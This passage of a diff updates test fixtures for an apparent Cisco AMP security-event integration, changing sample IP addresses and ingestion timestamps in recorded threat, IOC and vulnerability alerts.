8d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3304,7 +3304,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3349,7 +3349,7 @@ "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3359,8 +3359,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322508675Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", + "ingested": "2021-12-09T13:35:29.222616500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3380,7 +3380,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3428,7 +3428,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3438,8 +3438,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322510884Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", + "ingested": "2021-12-09T13:35:29.222621400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2020-12-25T05:30:41.000Z", @@ -3460,7 +3460,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3515,7 +3515,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3525,8 +3525,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322513087Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", + "ingested": "2021-12-09T13:35:29.222629400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2020-12-25T05:30:41.000Z", @@ -3547,7 +3547,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3601,7 +3601,7 @@ "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3611,8 +3611,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322515282Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", + "ingested": "2021-12-09T13:35:29.222635300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "code": "1107296279", "kind": "alert", "start": "2020-12-25T05:02:27.000Z", @@ -3633,7 +3633,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3701,7 +3701,7 @@ "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3711,8 +3711,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322517491Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", + "ingested": "2021-12-09T13:35:29.222639700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "code": "1107296279", "kind": "alert", "start": "2020-12-25T05:02:26.000Z", @@ -3733,7 +3733,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3801,7 +3801,7 @@ "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3811,8 +3811,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322519685Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", + "ingested": "2021-12-09T13:35:29.222643900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", "code": "1107296279", "kind": "alert", "start": "2020-12-25T04:32:53.000Z", @@ -3833,7 +3833,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3917,7 +3917,7 @@ "Demo_AMP_Intel" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3927,8 +3927,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322521941Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222647400Z", + "original": 